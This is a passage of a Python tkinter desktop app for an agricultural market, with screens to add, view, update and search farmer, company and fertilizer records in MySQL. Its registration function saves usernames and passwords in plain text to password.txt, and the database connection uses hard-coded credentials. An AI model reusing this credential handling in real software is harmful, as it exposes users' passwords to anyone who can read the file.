    label=Label(root,text=' '*800,font=('Times new roman',500),bg='ivory')
    label.place(x=0,y=0)
    #this window
    L1 = tk.Label(root, text="Username", font=("Arial Bold", 15), bg='ivory')
    L1.place(x=150, y=200)
    T1 = tk.Entry(root, width = 30, bd = 5)
    T1.place(x=380, y=200)
    L2 = tk.Label(root, text="Password", font=("Arial Bold", 15), bg='ivory')
    L2.place(x=150, y=250)
    T2 = tk.Entry(root, width = 30, show='*', bd = 5)
    T2.place(x=380, y=250)
    L2 = tk.Label(root, text="Confirm Password", font=("Arial Bold", 15), bg='ivory')
    L2.place(x=150, y=300)
    T3 = tk.Entry(root, width = 30, show='*', bd = 5)
    T3.place(x=380, y=300)
    reg_button=Button(root,text='Done',font=("Arial Bold",15),bg='blue',command=add_pass)
    reg_button.place(x=440,y=400)
def add_pass():
    """Append the new 'user=pass' credential to password.txt.

    Requires the password (T2) and confirmation (T3) to match; then appends
    one credential line and moves on to the entity page.
    """
    global root,T1,T2,T3
    if T2.get()!=T3.get():
        label=Label(root,text='Incorrect Password. Enter again',font=('times new roman',20))
        label.place(x=100,y=100)
    else:
        # Read any existing credentials; a missing file just means this is
        # the first registration (the original used a bare except for this).
        try:
            with open('password.txt','r') as f:
                data=f.read()
        except FileNotFoundError:
            data=''
        # Single write path instead of the original's duplicated try/except
        # bodies; also avoids writing a lone '\n' when the file was empty.
        with open('password.txt','w') as f:
            if data:
                f.write(data+'\n')
            f.write(T1.get()+'='+T2.get())
        entity_page()
def entity_page():
    """Main menu: one button per entity screen plus the booking-history view."""
    global root
    #cleaning previous window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='ivory')
    label.place(x=0,y=0)
    #this window
    label=Label(root,text='WELCOME TO AGRI MARKET ',font=('Times new roman',20),bg='blue')
    label.place(x=200,y=20)
    label=Label(root,text='Choose the Entity ',font=('Times new roman',20),bg='white')
    label.place(x=250,y=100)
    # NOTE(review): the local name `Button` shadows tkinter.Button below.
    Button = tk.Button(root, text="Farmers", font=("Arial", 15),command=farmer)
    Button.place(x=100, y=150+25)
    Button = tk.Button(root, text="Company", font=("Arial", 15),command=company)
    Button.place(x=300, y=150+25)
    Button = tk.Button(root, text="Fertilizer", font=("Arial", 15),command=fertilizer)
    Button.place(x=500, y=150+25)
    Button = tk.Button(root, text="Order", font=("Arial", 15),command=orders)
    Button.place(x=200, y=300+25)
    Button = tk.Button(root, text="Payment", font=("Arial", 15),command=payment)
    Button.place(x=400, y=300+25)
    Button = tk.Button(root, text="GET BOOKING HISTORY", font=("Arial", 15),command=history)
    Button.place(x=200, y=400+25)
#history
def history():
    """Show this month's payment rows via the `getMonth` stored procedure.

    Fills a scrollable Treeview with the procedure's result set, then tears
    down and re-opens the DB connection (a stored-procedure CALL leaves
    pending result sets on the connection; the reconnect is the app's crude
    way of resetting it).
    """
    global root,cur,db
    # Screen clear over the previous view.
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    cur.execute("CALL getMonth(%s);",[datetime.today().strftime("%m")])
    data=cur.fetchall()
    label=Label(root,text="The Transaction History of this month",font=("Arial",15))
    label.place(x=200,y=20)
    button=Button(root,text='BACK',command=entity_page)
    button.place(x=20,y=20)
    frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
    frame.place(x=10,y=100,width=750,height=400)
    x_scroll=Scrollbar(frame,orient=HORIZONTAL)
    y_scroll=Scrollbar(frame,orient=VERTICAL)
    table=ttk.Treeview(frame,columns=("trans_id",'p_f_id','p_date','p_amount','p_method'),xscrollcommand=x_scroll.set,
                       yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM,fill=X)
    y_scroll.pack(side=RIGHT,fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('trans_id',text="Transaction Id")
    table.heading('p_f_id',text="Farmer Id")
    table.heading('p_date',text="Payment Date")
    table.heading('p_amount',text="Amount")
    table.heading('p_method',text="Payment Method")
    table['show']='headings'
    table.pack()
    for row in data:
        table.insert('',END,values=row)
    db.close()
    # CONSISTENCY FIX: reconnect with the same credentials as the
    # module-level connection instead of a second, different hard-coded
    # user/database ('bhushi'/'farmer_app'), which silently diverged from
    # the top-of-file settings.  TODO(review): centralize these settings.
    db=mysql.connector.connect(host='localhost',user='root',passwd='PASSWORD',database='DATABASENAME')
    cur=db.cursor()
#farmer page
def farmer():
    """Farmer-table screen: toolbar of CRUD buttons plus the table view."""
    global root
    #clean previous window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Farmer Table',font=('Times new roman',15),bg='white')
    label.place(x=350,y=10)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_farmer)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_farmer)
    Button.place(x=210, y=50)
    Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_farmer)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_farmer)
    Button.place(x=410, y=50)
    view_farmer()
def view_farmer():
    """Render all rows of the `farmer` table in a scrollable Treeview."""
    frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
    frame.place(x=10,y=100,width=750,height=400)
    x_scroll=Scrollbar(frame,orient=HORIZONTAL)
    y_scroll=Scrollbar(frame,orient=VERTICAL)
    table=ttk.Treeview(frame,columns=("f_id",'f_name','f_phone','f_mail','f_locality','f_address'),xscrollcommand=x_scroll.set,
                         yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM,fill=X)
    y_scroll.pack(side=RIGHT,fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('f_id',text="Farmer Id")
    table.heading('f_name',text="Farmer Name")
    table.heading('f_phone',text="Farmer Phone")
    table.heading('f_mail',text="Farmer Mail")
    table.heading('f_locality',text="Farmer Locality")
    table.heading('f_address',text="Farmer Address")
    # Hide the implicit first tree column; show only the headings above.
    table['show']='headings'
    table.column("f_id",width=100)
    table.pack()
    cur.execute("SELECT * FROM farmer;")
    data =cur.fetchall()
    db.commit()
    if len(data)!=0:
        for row in data:
            table.insert('',END,values=row)
e1,e2,e3,e4,e5,e6=0,0,0,0,0,0
def insert_farmer():
    """Build the farmer-insert form (six labelled entries e1-e6).

    Commit fires insert_farmer_command().
    """
    global e1,e2,e3,e4,e5,e6
    #clean the window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #create the window
    label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')
    label.place(x=50,y=10)
    label=Label(root,text='Farmer_name',font=('Times new roman',20),bg='white')
    label.place(x=50,y=60)
    label=Label(root,text='Farmer_phone',font=('Times new roman',20),bg='white')
    label.place(x=50,y=110)
    label=Label(root,text='Farmer_mail',font=('Times new roman',20),bg='white')
    label.place(x=50,y=160)
    label=Label(root,text='Farmer_locality',font=('Times new roman',20),bg='white')
    label.place(x=50,y=210)
    label=Label(root,text='Farmer_address',font=('Times new roman',20),bg='white')
    label.place(x=50,y=270)
    e1=Entry(root,width=50)
    e2=Entry(root,width=50)
    e3=Entry(root,width=50)
    e4=Entry(root,width=50)
    e5=Entry(root,width=50)
    e6=Entry(root,width=50)
    e1.place(x=350,y=10)
    e2.place(x=350,y=60)
    e3.place(x=350,y=110)
    e4.place(x=350,y=160)
    e5.place(x=350,y=210)
    e6.place(x=350,y=270)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=farmer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_farmer_command)
    Button.place(x=400, y=400)
def insert_farmer_command():
    """Insert a farmer row from e1-e6 after a cheap id-length sanity check.

    Ids longer than 3 characters go to the invalid() screen; any other
    failure re-opens the insert form.
    """
    global root
    try:
        sql="INSERT INTO farmer values(%s,%s,%s,%s,%s,%s);"
        if len(e1.get())>3:
            invalid('farmer')
        else:
            vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get(),e6.get()
            # Single row: execute() instead of executemany() over a 1-list.
            cur.execute(sql,vals)
            db.commit()
            farmer()
    except Exception:
        # Narrowed from a bare `except:`.
        insert_farmer()
def invalid(page):
    """Show an 'enter a valid id' screen for the given entity.

    page: 'farmer' or 'company' — selects the message and which insert form
    the Re-enter button returns to.
    """
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    if page=='farmer':
        label=Label(root,text='Enter valid farmer_id',font=('Times new roman',30),bg='white')
        label.place(x=170,y=200)
        button=Button(root,text='Re-enter',font=('Times new roman',20),command=insert_farmer)
        button.place(x=300,y=400)
    elif page=='company':
        label=Label(root,text='Enter valid company_id',font=('Times new roman',30),bg='white')
        label.place(x=170,y=200)
        button=Button(root,text='Re-enter',font=('Times new roman',20),command=insert_company)
        button.place(x=300,y=400)
def delete_farmer():
    """Prompt for a farmer id to delete; Commit fires delete_farmer_command()."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=farmer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_farmer_command)
    Button.place(x=400, y=400)
def delete_farmer_command():
    """Delete the farmer whose id is typed in e1; label errors instead of
    crashing the callback."""
    try:
        sql="DELETE FROM farmer WHERE f_id=%s;"
        cur.execute(sql,[e1.get()])
        db.commit()
        farmer()
    except Exception:
        # Narrowed from a bare `except:`.
        l=Label(root,text='Invalid Entry',font=('times new roman',15))
        l.place(x=100,y=300)
def update_farmer():
    """Prompt for the id of the farmer to edit; OK hands off to update()."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="OK", font=("Arial", 15),command=update)
    Button.place(x=300, y=400)
def update():
    """Fetch the farmer picked in update_farmer() and rebuild the form
    pre-filled with the current values.

    On failure (bad id, empty result — data[0] raises IndexError) shows an
    error label and re-opens the id prompt.
    """
    try:
        global e1,e2,e3,e4,e5,e6
        # Screen clear.
        label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
        label.place(x=0,y=0)
        cur.execute('SELECT * FROM farmer WHERE f_id=%s;',[e1.get()])
        captions=['Farmer_id','Farmer_name','Farmer_phone','Farmer_mail',
                  'Farmer_locality','Farmer_address']
        ys=(10,60,110,160,210,270)
        for text,y in zip(captions,ys):
            label=Label(root,text=text,font=('Times new roman',20),bg='white')
            label.place(x=50,y=y)
        e1=Entry(root)
        e2=Entry(root)
        e3=Entry(root)
        e4=Entry(root)
        e5=Entry(root)
        e6=Entry(root)
        data=cur.fetchall()
        arr=[e1,e2,e3,e4,e5,e6]
        # Pre-fill each entry with the current column value.
        for count,val in enumerate(data[0]):
            arr[count].insert(0,val)
        for widget,y in zip(arr,ys):
            widget.place(x=350,y=y)
        label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command)
        label.place(x=300,y=400)
    except Exception:
        # Narrowed from a bare `except:`.
        l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))
        l.place(x=100,y=300)
        update_farmer()
def update_command():
    """Write the edited farmer fields (e2-e6) back to the row keyed by e1;
    re-open the id prompt on failure."""
    try:
        sql="UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;"
        vals=e2.get(),e3.get(),e4.get(),e5.get(),e6.get(),e1.get()
        # Single row: execute() instead of executemany() over a 1-list.
        cur.execute(sql,vals)
        db.commit()
        farmer()
    except Exception:
        # Narrowed from a bare `except:`.
        update_farmer()
def search_farmer():
    """Prompt for a farmer id to look up; Search hands off to search()."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=farmer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search)
    Button.place(x=400, y=400)
def search():
    """Look up one farmer by the id typed in e1 and show the row as labels.

    Falls back to search_farmer() with an error label on any failure.
    """
    # Screen clear.
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    try:
        cur.execute('SELECT * FROM farmer WHERE f_id=%s;',[e1.get()])
        Button = tk.Button(root, text="OK", font=("Arial", 15),command=farmer)
        Button.place(x=300, y=400)
        names=['farmer id: ','farmer name: ','farmer phone: ','farmer mail: ',
               'farmer locality: ','farmer address: ']
        for row in cur:
            # One caption+value label per column, stacked 50 px apart.
            for count,(name,value) in enumerate(zip(names,row)):
                label=Label(root,text=name+str(value),font=('Times new roman',20),bg='tomato')
                label.place(x=10,y=50+50*count)
        db.commit()
    except Exception:
        # Narrowed from a bare `except:`.
        l=Label(root,text='Invalid Farmer Id',font=('times new roman',15))
        l.place(x=100,y=300)
        search_farmer()
#company page
def company():
    """Company-table screen: toolbar of CRUD buttons plus the table view."""
    global root
    #clean previous window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Company Table',font=('Times new roman',15),bg='white')
    label.place(x=350,y=10)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_company)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_company)
    Button.place(x=210, y=50)
    Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_company)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_company)
    Button.place(x=410, y=50)
    view_company()
def view_company():
    """Render all rows of the `company` table in a scrollable Treeview."""
    frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
    frame.place(x=10,y=100,width=750,height=400)
    x_scroll=Scrollbar(frame,orient=HORIZONTAL)
    y_scroll=Scrollbar(frame,orient=VERTICAL)
    table=ttk.Treeview(frame,columns=("c_id",'c_name','c_address'),xscrollcommand=x_scroll.set,
                         yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM,fill=X)
    y_scroll.pack(side=RIGHT,fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('c_id',text="Company Id")
    table.heading('c_name',text="Company Name")
    table.heading('c_address',text="Company Address")
    # Hide the implicit first tree column; show only the headings above.
    table['show']='headings'
    table.column("c_id",width=100)
    table.pack()
    cur.execute("SELECT * FROM company;")
    data =cur.fetchall()
    db.commit()
    if len(data)!=0:
        for row in data:
            table.insert('',END,values=row)
def insert_company():
    """Build the company-insert form (id/name/address entries e1-e3).

    Commit fires insert_company_command().
    """
    global e1,e2,e3,e4,e5,e6
    #clean the window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #create the window
    label=Label(root,text='Company_id',font=('Times new roman',20),bg='white')
    label.place(x=50,y=10)
    label=Label(root,text='Company_name',font=('Times new roman',20),bg='white')
    label.place(x=50,y=110)
    label=Label(root,text='Company_address',font=('Times new roman',20),bg='white')
    label.place(x=50,y=210)
    e1=Entry(root,width=50)
    e2=Entry(root,width=50)
    e3=Entry(root,width=50)
    e1.place(x=350,y=10)
    e2.place(x=350,y=110)
    e3.place(x=350,y=210)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=company)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_company_command)
    Button.place(x=400, y=400)
def insert_company_command():
    """Insert a company row from e1-e3 after a cheap id-length sanity check.

    Ids longer than 3 characters go to the invalid() screen; any other
    failure re-opens the insert form.
    """
    try:
        if len(e1.get())>3:
            invalid("company")
        else:
            sql="INSERT INTO company values(%s,%s,%s);"
            vals=e1.get(),e2.get(),e3.get()
            # Single row: execute() instead of executemany() over a 1-list.
            cur.execute(sql,vals)
            db.commit()
            company()
    except Exception:
        # Narrowed from a bare `except:`.
        insert_company()
def delete_company():
    """Prompt for a company id to delete; Commit fires delete_company_command()."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=company)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_company_command)
    Button.place(x=400, y=400)
def delete_company_command():
    """Delete the company whose id is typed in e1; label errors instead of
    crashing the callback.

    The int() conversion makes a non-numeric id fail fast (ValueError) before
    hitting the DB.
    """
    try:
        sql="DELETE FROM company WHERE c_id=%s;"
        cur.execute(sql,[int(e1.get())])
        db.commit()
        company()
    except Exception:
        # Narrowed from a bare `except:`.
        l=Label(root,text='Invalid Entry',font=('times new roman',15))
        l.place(x=100,y=300)
def update_company():
    """Prompt for the id of the company to edit; OK hands off to update_c()."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="OK", font=("Arial", 15),command=update_c)
    Button.place(x=300, y=400)
def update_c():
    """Fetch the company picked in update_company() and rebuild the form
    pre-filled with the current values.

    On failure (bad id, empty result — data[0] raises IndexError) shows an
    error label and re-opens the id prompt.
    """
    try:
        global e1,e2,e3,e4,e5,e6
        # Screen clear.
        label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
        label.place(x=0,y=0)
        cur.execute('SELECT * FROM company WHERE c_id=%s;',[e1.get()])
        ys=(10,110,210)
        for text,y in zip(('Company_id','Company_name','Company_address'),ys):
            label=Label(root,text=text,font=('Times new roman',20),bg='white')
            label.place(x=50,y=y)
        e1=Entry(root)
        e2=Entry(root)
        e3=Entry(root)
        data=cur.fetchall()
        arr=[e1,e2,e3]
        # Pre-fill each entry with the current column value.
        for count,val in enumerate(data[0]):
            arr[count].insert(0,val)
        for widget,y in zip(arr,ys):
            widget.place(x=350,y=y)
        label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_c)
        label.place(x=300,y=400)
    except Exception:
        # BUGFIX: the message said 'Invalid Farmer_id' (copy-paste from the
        # farmer screen); also narrowed from a bare `except:`.
        l=Label(root,text='Invalid Company_id',font=('times new roman',15))
        l.place(x=100,y=300)
        update_company()
def update_command_c():
    """Write the edited company fields (e2, e3) back to the row keyed by e1;
    re-open the id prompt on failure."""
    try:
        sql="UPDATE company SET c_name=%s,c_address=%s WHERE c_id=%s;"
        vals=e2.get(),e3.get(),e1.get()
        # Single row: execute() instead of executemany() over a 1-list.
        cur.execute(sql,vals)
        db.commit()
        company()
    except Exception:
        # Narrowed from a bare `except:`.
        update_company()
def search_company():
    """Prompt for a company id to look up; Search hands off to search_c()."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Company Id:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=company)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_c)
    Button.place(x=400, y=400)
def search_c():
    """Look up one company by the id typed in e1 and show the row as labels.

    Falls back to search_company() with an error label on any failure.
    """
    # Screen clear.
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    try:
        cur.execute('SELECT * FROM company WHERE c_id=%s;',[e1.get()])
        Button = tk.Button(root, text="OK", font=("Arial", 15),command=company)
        Button.place(x=300, y=400)
        names=['company id: ','company name: ','company address: ']
        for row in cur:
            # One caption+value label per column, stacked 50 px apart.
            for count,(name,value) in enumerate(zip(names,row)):
                label=Label(root,text=name+str(value),font=('Times new roman',20),bg='tomato')
                label.place(x=10,y=50+50*count)
        db.commit()
    except Exception:
        # Narrowed from a bare `except:`.
        l=Label(root,text='Invalid Company Id',font=('times new roman',15))
        l.place(x=100,y=300)
        search_company()
#fertilizer page
def fertilizer():
    """Fertilizer-table screen: toolbar of CRUD buttons plus the table view."""
    global root
    #clean previous window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Fertilizer Table',font=('Times new roman',15),bg='white')
    label.place(x=350,y=10)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=entity_page)
    Button.place(x=10, y=50)
    Button = tk.Button(root, text="Insert", font=("Arial", 15),command=insert_fer)
    Button.place(x=110, y=50)
    Button = tk.Button(root, text="Delete", font=("Arial", 15),command=delete_fer)
    Button.place(x=210, y=50)
    Button = tk.Button(root, text="Update", font=("Arial", 15),command=update_fer)
    Button.place(x=310, y=50)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_fer)
    Button.place(x=410, y=50)
    view_fer()
def view_fer():
    """Render all rows of the `fertilizer` table in a scrollable Treeview."""
    frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')
    frame.place(x=10,y=100,width=750,height=400)
    x_scroll=Scrollbar(frame,orient=HORIZONTAL)
    y_scroll=Scrollbar(frame,orient=VERTICAL)
    table=ttk.Treeview(frame,columns=("fe_formula",'fe_name','fe_content','fe_price','company_id'),xscrollcommand=x_scroll.set,
                         yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM,fill=X)
    y_scroll.pack(side=RIGHT,fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    table.heading('fe_formula',text="Fertilizer Formula")
    table.heading('fe_name',text="Fertilizer name")
    table.heading('fe_content',text="Fertilizer content")
    table.heading('fe_price',text="Fertilizer price")
    table.heading('company_id',text="Company_id")
    #table.heading('f_address',text="Farmer Address")
    # Hide the implicit first tree column; show only the headings above.
    table['show']='headings'
    #table.column("f_id",width=100)
    table.pack()
    cur.execute("SELECT * FROM fertilizer;")
    data =cur.fetchall()
    db.commit()
    if len(data)!=0:
        for row in data:
            table.insert('',END,values=row)
e1,e2,e3,e4,e5,e6=0,0,0,0,0,0
def insert_fer():
    """Build the fertilizer-insert form (five labelled entries e1-e5).

    Commit fires insert_fer_command().
    """
    global e1,e2,e3,e4,e5,e6
    #clean the window
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #create the window
    label=Label(root,text='Fertlizer formula',font=('Times new roman',20),bg='white')
    label.place(x=50,y=10)
    label=Label(root,text='Fertlizer name',font=('Times new roman',20),bg='white')
    label.place(x=50,y=60)
    label=Label(root,text='Fertilizer content',font=('Times new roman',20),bg='white')
    label.place(x=50,y=110)
    label=Label(root,text='Fertlizer price',font=('Times new roman',20),bg='white')
    label.place(x=50,y=160)
    label=Label(root,text='Company id',font=('Times new roman',20),bg='white')
    label.place(x=50,y=210)
    e1=Entry(root,width=50)
    e2=Entry(root,width=50)
    e3=Entry(root,width=50)
    e4=Entry(root,width=50)
    e5=Entry(root,width=50)
    #e6=Entry(root,width=50)
    e1.place(x=350,y=10)
    e2.place(x=350,y=60)
    e3.place(x=350,y=110)
    e4.place(x=350,y=160)
    e5.place(x=350,y=210)
    #e6.place(x=350,y=270)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=fertilizer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=insert_fer_command)
    Button.place(x=400, y=400)
def insert_fer_command():
    """Insert one fertilizer row from e1-e5; re-open the form on failure."""
    try:
        sql="INSERT INTO fertilizer values(%s,%s,%s,%s,%s);"
        vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get()
        # Single row: execute() instead of executemany() over a 1-list.
        cur.execute(sql,vals)
        db.commit()
        fertilizer()
    except Exception:
        # Narrowed from a bare `except:`.
        insert_fer()
def delete_fer():
    """Prompt for a fertilizer formula to delete; Commit fires delete_fer_command()."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Fertilizer formula:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=fertilizer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Commit", font=("Arial", 15),command=delete_fer_command)
    Button.place(x=400, y=400)
def delete_fer_command():
    """Delete the fertilizer whose formula is typed in e1; label errors
    instead of crashing the callback."""
    try:
        sql="DELETE FROM fertilizer WHERE fe_formula=%s;"
        cur.execute(sql,[e1.get()])
        db.commit()
        fertilizer()
    except Exception:
        # Narrowed from a bare `except:`.
        l=Label(root,text='Invalid Entry',font=('times new roman',15))
        l.place(x=100,y=300)
def update_fer():
    """Prompt for the formula of the fertilizer to edit; OK hands off to update_fe()."""
    global e1
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Fertlizer formula:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="OK", font=("Arial", 15),command=update_fe)
    Button.place(x=300, y=400)
def update_fe():
    """Fetch the fertilizer picked in update_fer() and rebuild the form
    pre-filled with the current values.

    On failure (bad formula, empty result — data[0] raises IndexError) shows
    an error label and re-opens the prompt.
    """
    try:
        global e1,e2,e3,e4,e5,e6
        # Screen clear.
        label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
        label.place(x=0,y=0)
        cur.execute('SELECT * FROM fertilizer WHERE fe_formula=%s;',[e1.get()])
        captions=['Fertlizer formula','Fertlizer name','Fertlizer content',
                  'Fertlizer price','comapny_id']
        for i,text in enumerate(captions):
            label=Label(root,text=text,font=('Times new roman',20),bg='white')
            label.place(x=50,y=10+50*i)
        e1=Entry(root)
        e2=Entry(root)
        e3=Entry(root)
        e4=Entry(root)
        e5=Entry(root)
        data=cur.fetchall()
        # BUGFIX: the original list ended with the stale global e6, which is
        # never created on this screen (its creation is commented out); a
        # fertilizer row has exactly the five fields built above.
        arr=[e1,e2,e3,e4,e5]
        for count,val in enumerate(data[0]):
            arr[count].insert(0,val)
        for i,widget in enumerate(arr):
            widget.place(x=350,y=10+50*i)
        label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command_fe)
        label.place(x=300,y=400)
    except Exception:
        # BUGFIX: the message said 'Invalid Farmer_id' (copy-paste from the
        # farmer screen); also narrowed from a bare `except:`.
        l=Label(root,text='Invalid Fertilizer formula',font=('times new roman',15))
        l.place(x=100,y=300)
        update_fer()
def update_command_fe():
    """Persist the edited fertilizer entries back to the DB, keyed by formula."""
    sql="UPDATE fertilizer SET fe_name=%s,fe_content=%s,fe_price=%s,company_id=%s WHERE fe_formula=%s;"
    vals=e2.get(),e3.get(),e4.get(),e5.get(),e1.get()
    # One statement, one parameter tuple: execute() is the right call (the
    # original wrapped the tuple in a list just to use executemany()).
    cur.execute(sql,vals)
    db.commit()
    fertilizer()
def search_fer():
    """Render the 'search fertilizer' form: one entry for the formula key."""
    global e1
    #clean
    # Blank out the previous screen.
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    #window
    label=Label(root,text='Fertlizer formula:',font=('Times new roman',20),bg='tomato')
    label.place(x=100,y=200)
    e1=Entry(root,width=50)
    e1.place(x=300,y=200)
    Button = tk.Button(root, text="Back", font=("Arial", 15),command=fertilizer)
    Button.place(x=200, y=400)
    Button = tk.Button(root, text="Search", font=("Arial", 15),command=search_fe)
    Button.place(x=400, y=400)
def search_fe():
    """Look up the fertilizer row keyed by the formula in e1 and display its fields as labels."""
    #clean
    label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')
    label.place(x=0,y=0)
    try:
        sql='SELECT * FROM fertilizer WHERE fe_formula=%s;'
        val=[e1.get()]
        cur.execute(sql,val)
        Button = tk.Button(root, text="OK", font=("Arial", 15),command=fertilizer)
        Button.place(x=300, y=400)
        # Iterating the cursor yields the matched row(s); each column is shown
        # on its own line with a caption from `names`.
        for val in cur:
            count=0
            Y=50
            names=['fertilizer formula: ','fertilizer name: ','fertilizer content: ','fertilizer price: ','company_id: ']
            for i in val:
                label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')
                label.place(x=10,y=Y)
                Y+=50
                count+=1
        db.commit()
    except:
        # NOTE(review): bare except — any failure re-renders the search form.
        l=Label(root,text='Invalid Fertilizer formula',font=('times new roman',15))
        l.place(x=100,y=300)
        search_fer()
#order page
def orders():
    """Render the Orders screen: CRUD buttons plus the orders table view."""
    global root
    #clean previous window
